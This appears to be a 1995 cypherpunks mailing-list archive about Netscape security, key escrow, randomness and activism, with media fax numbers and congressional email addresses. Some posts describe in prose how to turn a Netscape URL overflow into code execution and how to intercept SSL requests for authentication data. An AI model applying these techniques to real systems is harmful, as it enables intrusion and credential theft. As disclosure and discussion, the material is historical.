> the pit bull of the internet nipping at everyone's heels here
> and slaying any unwarranted peace!! however I haven't seen any 
> well-deserved rebuttals however, so..
> 
> I'm again going to be a netscape apologist and say, GEEZ, PM, 
> will you take it easy, and untangle your underwear knots?
> 
> as has been pointed out numerous times, the encryption in the Netscape
> code is designed to handle credit c
rd number transport, *not*
> actual cash transport. its really silly to have more security
> present than is available than the weakest link. it would be like
> worrying about a fence around the white house when one is giving
> open tours to the public every day!!

Uh, there is a fence around the White House and they do give daily tours.

I might add that there are a good number of people who worry about it 
every day.

I might also add that it is even more silly to design a software package, 
where additional security might easily be added, which has too little 
security to be expanded into other roles.  This is called 'designed 
obsolesence.'  Wells Fargo bank is allowing account transactions over 
their webpage, one assumes this does, or will soon include "cash transfers."

> 
> PM is rather secretive about the systems he is working on, but
> I suspect they are stock systems that must be highly secure because
> they actually involve *transfer* of cash, and *large*amounts* of it,
> in a *time-critical* environment, with *large corporate clients*.  these
> are all inappropriate criteria to judge Netscape by.

I believe this is a demonstration of your lack of vision, "vznuri."  
Netscape's potential in the next 8-12 months alone dictates that they 
should be concentrating on attracting corporate clients, as does their 
new obligation to stockholders who have yet to see a penny of profit not 
related to speculation and stock price fluxuation.

  in the Netscape 
> scenario, the software is *not* transfering cash itself, *not* transferring 
> large amounts of it, and *not* in a time critical application, and *not*
> geared toward large corporations, but instead individual users. 
> it is relying on another infrastructure (credit cards) for the actual 
> transaction mechanisms.


For now, perhaps.  It seem you would have that limitation written in stone.
 
> 
> as has been pointed out numerous times, the whole
> credit card apparatus is somewhat based on "security through obscurity", 
> i.e. the obscurity of a credit card number, and it doesn't make a whole
> lot of sense to try to make this more "secure".

I'm not quite sure you mean this, but if you do, you're just small minded.
Why don't you read it again.

 this is a problem for
> credit card companies to fix (I agree it is a horrible problem, that costs
> us billions, and should have been fixed a long time ago) .. but holding
> credit card *using* companies responsible for this deficiency 
> doesn't make sense. they are not the enemy!! they would surely seize the
> most secure mechanism available, if there were alternatives.

There are, they haven't.

> the distinction is subtle, but I think a relevant one:

Then it's unfortunate that you have missed it so completely.

> is
> the software itself transfering cash, or building on another system
> that does so? hopefully in the latter case, the requirements for a
> successful implementation are not so difficult to achieve (so that
> even fresh-out-of-college CS students can call the functions to
> do so, and perhaps code packages are written such that the user
> is protected from their own naivete, or what PM would call stupidity
> or incompetence).

Looking at Netscape, and moreover, the entire set of browsing programs, 
you speak like a petty government offical.  By limiting the scope of 
potential of various browsers you do nothing to further the cause of easy 
to reach strong crypto for everyone in a transparent and widely 
distributed package.  Instead you believe we should forgive Netscape it's 
oversights (and carelessness) because it was never meant to transfer 
funds over the internet.  "It's a petty program, you should ignore it" is 
what you're really saying, which completely misses the fact, that 
millions of people are using/going to use it, and they are as likely to 
use it for banking as for shopping at home as for 'surfing.'

Then again, perhaps your intent was never to make strong encryption 
available to the masses.

> --
> 
> PM gives some excellent techniques for improving code security (some
> of these may not be exactly what he proposed):
> 
> 1. hiring experts
> 2. code reviews
> 3. restrictions of who can work on what code (security clearance)
> 4. heavy testing
> 5. antagonistic attacks (i.e. hiring someone trying to crack the code that
> others have written)
> 6. open review of key code
> 
> however, put all these things together and you get a company apparatus
> a bit more like the NSA than a commercial company. I agree that all
> these precaution are relevant for banking and stock transaction software
> transferring millions of dollars.  but holding a joe-schmoe GUI and 
> Web company responsible for this kind of paranoid oversight is really 
> impossible and unrealistic and *unnecessary*.
> 
> there will be some companies that specialize in creating the 
> *secure*infrastructure* for communications transactions. other companies
> will just *latch on* to this existing infrastructure. hopefully the
> requirements for *latching on* will not be too difficult, otherwise we
> are all in trouble!! 
>  
> now, admittedly, it would be ideal if the netscape code was highly
> secure, but again, I just don't think it is in the best interests of
> this company to become security paranoid to the degrees that I have
> listed above, and the extreme degrees that people here are ranting about. 
> rather they should try to blend in with other companies
> who specialize in cryptographic security. the latter companies should
> as much as possible provide foolproof modules. they should take care
> of all functions that have a potential for problem, such as random
> number generation, key exchange, etc.  they should try to provide
> a minimum of training where the code is not foolproof.
> 
> many have been making the point that one cannot judge the security of
> a package based simply on analyzing key modules. I actually don't think this 
> has been proven in general and completely resolved yet. I can imagine 
> modules that communication with software such that the module 
> itself is a "secure environment" in general, and
> it is almost impossible to misuse the software itself. (for example,
> the software might never store the actual keys of transactions itself, 
> this being handled by a secure module, making it impossible to 
> accidentally reveal them).
> 
> some day we might actually see "secure module support" built into a 
> microprocessor. in many ways the microprocessors that guard against
> illegal memory accesses and illegal function calls are in a sense
> providing a kind of cryptographic security. and people who study
> secure OSes generally eventually conclude that for ultimate security,
> you almost have to work from the ground up, starting with memory,
> microprocessors, and network hardware.
> 
> --
> 
> so my general point is that PM's rant, while lots of fun to read..
> 
> >you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about
> >REAL code!! us old timers were writing code as secure and impenetrable
> >as granite bricks, impregnable as a frigid victorian gandmother,
> >before you were a twinkle in your mama's eye!! learn some
> >sufficent grovelling skills for your superiors or you will
> >not only be fired from your JOB but be excommunicated from the
> >entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
> >hung from your neck in the nearest tree!!! your employer will throw
> >you to the wolves, your customers will spit on your flayed carcass,
> >your family will look upon your shrivelled remains with shame,  the
> >vultures will vomit your undigestable eviscerated entrails,
> >and the world immediately explode, if you have a 
> >SINGLE BUFFER OVERFLOW *anywhere* in your code!!
> 
> (ahem) this is not appropriate in the context of Netscape's aims, unless they
> want to become financial transaction experts more in line with banking
> expertise. netscape is more a "bring cyberspace to the masses" company,
> not "bring secure transactions to cyberspace". it's just because so
> few companies are successfully doing the latter, that netscape is forced
> to implement some "key" aspects of it to support the former. but I suspect
> they may ease out of the cryptographic security business in the long run,
> delegating it to other companies' plug-in-packages.
> 
> furthermore, cyberspace is growing gradually. the way we get to really
> incredible secure transactions is through a growing process, an evolution
> in which mistakes are made at different levels, and which in the beginning
> the software is not much more than a toy that looks pretty and has the
> fewest moving parts and most simplistic design imaginable. 
> 
> I fully believe that some day a company in cyberspace will exist
> that satisfies PM's and all other cypherpunk's most erotic dreams 
> about secure transactions. however that day is years away and it
> will take a long time to reach it. and I doubt that it will be the
> same company that is playing around with GUI's for the end user and
> hiring college programming hot-shots and Java geeks.  IMHO netscape 
> is probably not going to be the company that will try to bring the
> *lowlevel infrastructure* for cash, judging by the current winds,
> although that could change. they will definitely help guide its
> progress and be interacting with the companies that do, however.
> 
> when the big Secure Transactions Inc.  company is invented for
> cyberspace, *then* the kinds of absolutely uncompromising  standards that PM
> embodies will be in place. but again, we cannot expect the companies
> of today to embody that ideology and atmosphere for a few years yet.
> 
> the cypherpunks play a very valuable role in finding these "growing
> pain" mistakes of beginning companies such as Netscape,
> but we are not really serving our own best interests or the 
> harmonious growth of cyberspace by vilifying/ embarrassing/ 
> browbeating/ humiliating companies or their employees over their security
> problems, at least if they are clearly responsive to far less ammunition.
> keep in mind that NSA unbreakable security is *just*not*appropriate* in
> every situation, and in fact "weak" encryption does have legitimate 
> uses (i.e. in a world where people routinely lock their keys in their
> cars). (although I agree, in general one should always try to design a 
> system to be as secure as possible.)
> 
> (oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. 
> my humble apologies; @#$%^&* cryptoanarchist vocabulary)
>  
> that all said, nevertheless, I do enjoy PM's periodic displays of 
> undigestable bile eruptions at least as much as one of the other 
> infamous amusing crackpots circulating in this corner of cyberspace..
> (but geez, PM, were you raised by a pack of wild wolves or what?)
> 
> p.s. to TCM: why do you continually find my login name abbreviation so 
> fascinating??? my apologies to anyone if I am missing some kind of 
> inside joke here, I'm a little dense at times <g>
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Mon, 25 Sep 95 16:13:20 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Golden Coy Freeh
Message-ID: <9509252313.AA22112@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 9/25/95 -0400, Black Unicorn wrote:
>On Mon, 25 Sep 1995, John Young wrote:
>> 
>>    Last week, Mr. Freeh stressed that he preferred a voluntary
>>    approach. But "if consensus is impossible" on the
>>    encryption issue, he said, the F.B.I. might consider other
>>    approaches.
>> 
>
>I think it *tremendously* disturbing that the F.B.I. suddenly thinks 
>itself part of the Legislative branch, able to make law and dictate 
>policy to the rest of the country.
>
>In fact there is a plague of this kind of thing, law making in the wrong 
>channels, as if the executive agencies in the United States were suddenly 
>able to implement their own law.
>
   Today I attended the Telecommunications Conference here in Blacksburg 
sponsored by Rep. Rick Boucher (D-VA), in which an interesting cast of
characters
(including Clarence Irving, Asst Secretary of Commerce for Telecommunication 
Policy, and presidents and Sr. VPs of Sprint, Time-Warner, GTE, Bell Atlantic)
served as panelists.  One purpose of the conference was to discuss the upcoming 
conference committee that will try to reconcile the House and Senate telco
reform 
bills (which Boucher will likely be on).  After hearing each of these folks
stress 
the importance of competitiveness, privacy, and security, during the Q&A
session I 
asked the panel what they thought about the likelihood of
government-mandated key 
escrow, which the FBI and others are likely to push.  
   Only Boucher stood up to address the question, and he offered a forceful
denunciation of the entire logic of mandated escrow, citing the litany of
reasons
against it, including the observation that it was ridiculous from a
competitiveness
standpoint, noting that no foreign customers would ever buy such systems because
of the fear that, among others, "the CIA would be reading their mail."  He
hastened
to note that although he felt strongly that in the current congress the
calls for
mandatory key escrow would go nowhere, "things could look very different"
after the
next round of elections.  The guy from Commerce had nothing to say on the
question.

rj
 
------------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Tue, 26 Sep 95 06:29:20 PDT
To: khijol!netcom.com!norm@cygnus.com (Norman Hardy)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <ac8ccae902021004990a@DialupEudora>
Message-ID: <199509260036.TAA21140@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Very interesting. I wouldn't be too sure that a transmitted signal at a
> single frequency is the only signal that an opponent could use to bias your
> random numbers. How do you "test for randomness". I think that signal to
> noise arguments, phrased in terms of entropy, can protect you against
> unknown and unwanted signal. (Ironically you want a very low signal to
> noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you
> need n bits and run them thru MD5. Here S is the signal strength of the
> maximum plausible unwanted signal, and N is the noise of the diode.

I tested for randomness by looking at the distribution of random numbers 
over the range I was drawing random numbers from.  If it didn't look 
random, it wasn't ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGdK9SS9AwzY9LDxAQHdVQQAjwez1skYK8eaClLEq7mCb0V8aPERe/58
3AxH5W9JuaJqWD/nArVLW7HAY4tOM5Sjb2IHZsK3wF29Bd3A/TI0GM5Y1y2vOF9P
rNlkM2schf2nfsx7BdfqxWYELxCRUUeZTIagxwWSNMmCbMS22bMiYguVnxHqrjj1
g9n1fCzVDHA=
=tpBm
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 26 Sep 95 06:17:02 PDT
To: cypherpunks@toad.com
Subject: getting netscape to support the remailers
Message-ID: <199509260239.TAA14898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I started thinking about what it would take to get Netscape to
support sending mail through the remailers, after having read the
S/MIME specs which Netscape 2.0 is apparently going to
support. Perhaps with enough browbeating Netscape 3.0 will support the
remailers.

	I think that in order to get netscape to support the remailers
the remailers will have to:

A) Support S/MIME
B) Have a documented protocol, MIME-related

	Did Ray Cromwell do some work towards MIMEifiying the
remailers? My impression of his work back when he posted was that it
trusted the remailers too much, but perhaps my memory is flawed-- in
any case his work may be helpful towards developing a remailer
standard, which could then help get support incorporated into
MIME agents.

	I will begin work on a preliminary specification, and post my
results. I figure MIME remailers would allow for:

1) Transparent reply-blocks
	Someone could have a multipart mime message where one of the
parts is Content-Type: reply-block and the MUA would see that and
understand to send replies with that reply block to the remailers.

	I will be posting more as I work out the details. I welcome
comments, suggestions, etc., as I figure that my initial specification
will require much improvement.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Sep 95 06:32:16 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <447bes$7ai@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.950925201850.4260C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff - there are two ways to get the document information right (or wrong).

The first approach is to use redirects to point the client back at the 
original server once you've grabbed whatever info you want for the 
request. Redirects from https -> https don't trigger a warning box. You 
may need to rewrite the URL slightly to prevent loop detection (stick a . 
at the end of the hostname, or add a port, etc. 

The second approach is to only intercept requests for inline images. 
These don't affect the document information window, and give you full 
access to the whole request, which may have user authentication information 
associated with it, in the URL or in  header fields. Image requess can be 
identified reliably through simple traffic analysis.

Simon

Contract with America - Explained!			|Phone: +44-81-500-3000
Contract: verb						|Mail: ses@unc.edu
1) To shrink or reduce in size - the economy contracted +-----------------------
2) To become infected -My baby contracted pneumonia when they stopped my welfare





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Tue, 26 Sep 95 06:34:19 PDT
To: pdarnows@rwd.goucher.edu>
Subject: Fax Number List
Message-ID: <Pine.ULT.3.91.950925192929.1630E-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I promised last week that I would send this out when the idea of a 
blanket-fax-campaign for a c-punks press release was being discussed.  
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network 
_nor_ the Eye on America show, but I'm sure we'll find those numbers 
somewhere.  

I got it from the Iron Feather Journal, volume 14.  I have no reason to 
believe that any of these numbers are incorrect, but some of them may 
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please 
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
ABC World News      NY			1-212-456-4968
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP 		    Washington, D.C.    1-202-828-6422
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Boston, MA		1-617-338-8215
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245  
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    NY			1-212-975-1519
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321  
CBS TV 		    San Francisco	1-415-362-7417
Ch. Sci Monitor     Washington, D.C.    1-202-223-3476
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    Los Angeles		1-213-460-5081
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
Good Mng America    Washington, D.C.  	1-202-887-7685
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC (Radio)	    Washington, D.C.	1-703-685-2197
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News	    New York, NY	1-212-956-2140
NBC News	    San Francisco, CA	1-415-441-2823  David Burrington
NBC News President  New York, NY	1-212-315-4037  Michael Gartner
NBC TV	  	    Los Angeles		1-818-840-4275
NBC TV 		    San Francisco, CA	1-415-441-2823
Newsweek	    Los Angeles, CA	1-213-444-5287  Managing Editor
Newsweek	    New York, NY	1-212-421-4993  Jonathan Alter
Newsweek	    Washington, D.C. 	1-202-783-6512  
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-408-730-2107  Tracy Stephenson
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237  
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362  
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-276-5527
Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Sep 95 06:24:38 PDT
To: cypherpunks@toad.com
Subject: Re: Net KiddiePorn Hype on TV
In-Reply-To: <v01510106ac8c839e406c@[164.110.102.112]>
Message-ID: <9cg1BD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jkandt@mail.wsdot.wa.gov (Jeff Kandt) writes:
> I heard that piece too.  Sounded like a total PR move for Curtis
> Slewah(sp?) and his Guardian Angels.  They certainly didn't sound like they
> knew what they were doing, technically speaking.

Curtis Sliwa is rather notorious in NYC politics. He used to have a talk
show with his wife Lisa in WABC; not sure what happened to it after they
got divorced. He admitted staging an physical attack on himself to increase
his popularity; after the attack he claimed the cops did it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 25 Sep 95 13:47:57 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <9509252047.AA01994@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



It's not an exploit script, but you can find an auto crash "animation"
for Ray's discovered bug on 
  http://hplyot.obspm.fr/~dl/netscapesec/c1.html
(or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)
Btw, from my tests, looks like the SunOs version is not crashing after
356 bytes like my first HPUX/Solaris test but needs a slightly longer
url, if folks can try out the above urls and confirm/infirm crash for
other platforms, thx !


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

assassination North Korea terrorist SEAL Team 6 radar supercomputer
PLO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 06:21:38 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Decompiling Netscape
In-Reply-To: <v02120d02ac8cdee21178@[199.2.22.120]>
Message-ID: <199509260153.VAA11436@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Doug,
  I've managed to find a URL which can place an arbitrary value in
the PC register without disassembly. What I did was make  a URL

abcdefg....ABCDEFG....ZAaBbCcDd.....ZzAAaaBBbbCCcc.....ZZzz


then, when Netscape coredumped and the PC gets modified, I look
at the PC, say 0x54535251 and see that it is QRST, so I place
the PC register there.  Now all I need is some 386 code under
BSDI2.0 to do an execve.

I just wrote a simple execve in C, compiled it, and stole the appropriate
magic kernel library invocation sequence. What I need to do now is 
1) find out the approximate address of the stack pointer,
2) generate some code that has a whole lotta NOPs, followed by the
execve sequence, and finally, preface all that by a PC value that
will hopefully land somewhere inside that field of NOPs on the stack.
And all this has to be done without using any characters which will
stop netscape from reading in more pieces of the domain string.

You might be able to use the same techniques to whip up a quick exploit
on your systems. By far, the best exploits will be on the Mac and
Windows (especially), because those make up the majority of people
using Netscape. Create an exploit on Windows, and stun the world.  ;-)


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:13:06 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <199509251256.IAA27310@gatekeeper.itribe.net>
Message-ID: <4479g1$7ai@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509251256.IAA27310@gatekeeper.itribe.net>, bianco@itribe.net (David J. Bianco) writes:
> On Sep 25,  2:38, Phil Karlton sent the following to the NSA's mail
> archives:
> > Subject: Netscape "random" number seed generator code available
> || As is mentioned in the README, more will need to be done to find more
> || bits of entropy. (Too much of a good thing is still not enough.)
> || However the security team believes that the RNG seed is no longer the
> || weak link and candidate for attack.  So I am personally volunteering
> || to have my had shaved if a discovered deficiency in this code results
> || in an easily attacked generated seed. [You will be expected to show
> || your work. :-)]
> ||
> 
> Will you put a picture up on http://www.netscape.com/ someone does find
> a problem? 8-)

  I will make sure that a picture is available on the web if Phil has
to shave his head.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Tue, 26 Sep 95 06:22:50 PDT
To: cypherpunks@toad.com
Subject: Re: List of US representitives
Message-ID: <9509260213.AA29843@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:37 PM 9/25/95 EST, Brian Gorka wrote:
>Someone posted a list of US reps awhile back...  Can someone forward me a
copy? 
>Thanks.

Brian,

  Here's the list you requested.  Linda Thompson (lindat@iquest.net) posted
this in August, 1995.

Regards -
  Lynne

                                ++++++++++

senator@boxer.senate.gov
senator_brown@brown.senate.gov,
sen_dodd@dodd.senate.gov,
senator_lieberman@lieberman.senate.gov,
joe_biden@biden.senate.gov,
senator_coverdell@coverdell.senate.gov,
tom_harkin@harkin.senate.gov,
chuck_grassley@grassley.senate.gov,
larry_craig@craig.senate.gov,
dirk_kempthorne@kempthorne.senate.gov,
senator@simon.senate.gov,
senator@moseley-braun.senate.gov,
wendell_ford@ford.senate.gov,
senator@breaux.senate.gov,
senator@johnston.senate.gov,
senator@kennedy.senate.gov,
john_kerry@kerry.senate.gov,
senator@mikulski.senate.gov,
senator@levin.senate.gov,
mail_grams@grams.senate.gov,
senator@wellstone.senate.gov,
john_ashcroft@ashcroft.senate.gov,
max@baucus.senate.gov,
conrad_burns@burns.senate.gov,
bob@kerrey.senate.gov,
mailbox@gregg.senate.gov,
opinion@smith.senate.gov,
senator@bradley.senate.gov,
senator_Bingaman@bingaman.senate.gov,
senator_domenici@domenici.senate.gov,
senator_reid@reid.senate.gov,
senator_dewine@dewine.senate.gov,
nickles@rpc.senate.gov,
lugar@iquest.net
senator_chafee@chafee.senate.gov,
senator@hollings.senate.gov,
tom_daschle@daschle.senate.gov,
larry_pressler@pressler.senate.gov,
senator_frist@frist.senate.gov,
senator@hutchison.senate.gov,
senator_robb@robb.senate.gov,
senator@warner.senate.gov,
senator_leahy@leahy.senate.gov,
vermont@jeffords.senate.gov,
senator_Gorton@gorton.senate.gov,
russell_feingold@feingold.senate.gov,
senator@rockefeller.senate.gov,
everett@hr.house.gov,
budmail@hr.house.gov,
sbachus@hr.house.gov,
jdickey@hr.house.gov,
edpastor@hr.house.gov,
dcaucus@hr.house.gov,
woolsey@hr.house.gov,
gmiller@hr.house.gov,
sfnancy@hr.house.gov,
talk2tom@hr.house.gov,
petemail@hr.house.gov,
annagram@hr.house.gov,
tellnorm@hr.house.gov,
zoegram@hr.house.gov,
samfarr@hr.house.gov,
george@hr.house.gov,
andrea22@hr.house.gov,
tellbuck@hr.house.gov,
jharman@hr.house.gov,
tucker96@hr.house.gov,
housesst@hr.house.gov,
rpackard@hr.house.gov,
skaggs@hr.house.gov,
schaefer@hr.house.gov,
bozrah@hr.house.gov,
cshays@hr.house.gov,
delaware@hr.house.gov,
kthurman@hr.house.gov,
cstearns@hr.house.gov,
canady@hr.house.gov,
pdeutsch@hr.house.gov,
hastings@hr.house.gov,
jlinder@hr.house.gov,
georgia6@hr.house.gov,
saxby@hr.house.gov,
ga10@hr.house.gov,
runderwo@hr.house.gov,
brush@hr.house.gov,
luisg@hr.house.gov,
hfawell@hr.house.gov,
dhastert@hr.house.gov,
durbin@hr.house.gov,
johnhost@hr.house.gov,
emailpat@hr.house.gov,
edky01@hr.house.gov,
mward2@hr.house.gov,
bunning4@hr.house.gov,
torkma06@hr.house.gov,
jmoakley@hr.house.gov,
cardin@hr.house.gov,
tellhoek@hr.house.gov,
congehlr@hr.house.gov,
davecamp@hr.house.gov,
repsmith@hr.house.gov,
chrysler@hr.house.gov,
lrivers@hr.house.gov,
jconyers@hr.house.gov,
gil@hr.house.gov,
dminge@hr.house.gov,
mn03@hr.house.gov,
vento@hr.house.gov, 
tellbill@hr.house.gov,
tocollin@hr.house.gov,
oberstar@hr.house.gov,
goldsmit@iquest.net
talentmo@hr.house.gov,
demldr@hr.house.gov,
bemerson@hr.house.gov,
bthompson@hr.house.gov,
funnc02@hr.house.gov,
thechief@hr.house.gov,
mail2nc5@hr.house.gov,
crose@hr.house.gov,
myrick@hr.house.gov,
chtaylor@hr.house.gov,
melmail@hr.house.gov,
epomeroy@hr.house.gov,
zeliff@hr.house.gov,
franksnj@hr.house.gov, 
dzimmer@hr.house.gov,
mpforbes@hr.house.gov,
lazio@hr.house.gov,
tmanton@hr.house.gov,
molinari@hr.house.gov,
rangel@hr.house.gov,
jserrano@hr.house.gov,
engeline@hr.house.gov,
boehlert@hr.house.gov,
bpaxon@hr.house.gov,
portmail@hr.house.gov,
hokemail@hr.house.gov,
istook@hr.house.gov,
furseor1@hr.house.gov,
pdefazio@hr.house.gov,
murtha@hr.house.gov,
jonfox@hr.house.gov,
mchale@hr.house.gov,
pa16@hr.house.gov,
jspratt@hr.house.gov,
cwilson@hr.house.gov,
samtx03@hr.house.gov,
barton06@hr.house.gov,
doggett@hr.house.gov,
frost@hr.house.gov,
ggreen@hr.house.gov,
enidutah@hr.house.gov,
ortonut3@hr.house.gov,
opickett@hr.house.gov,
talk2bob@hr.house.gov,
ninthnet@hr.house.gov,
bsanders@igc.apc.org,
repwhite@hr.house.gov,
asklinda@hr.house.gov,
dunnwa08@hr.house.gov,
rtate@hr.house.gov,
mneumann@hr.house.gov,
badger02@hr.house.gov,
roth08@hr.house.gov,
commerce@hr.house.gov,
slabmgnt@hr.house.gov,
resource@hr.house.gov,
housesst@hr.house.gov,
smbizcom@hr.house.gov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGdiOj5A4+Z4Wnt9AQH5dwP+ItAzI/4EpqKaO34oKpOyI2QFcX8o5IYf
vqAWC9u4D/cEuWx8hmVIe+r5iFmgbx3jIW2fPtzeu9G8VnPu5YrefzQGVR1UQsNz
ockVde+WJb96M+To8u2141zMkHSr3ZurHjWk+K6Ft4c1ek0eRkYchUwEnvfigwZb
DQCDjR+mb84=
=az85
-----END PGP SIGNATURE-----

********************************************************************
Lynne L. Harrison, Esq.
34 Cannon Street
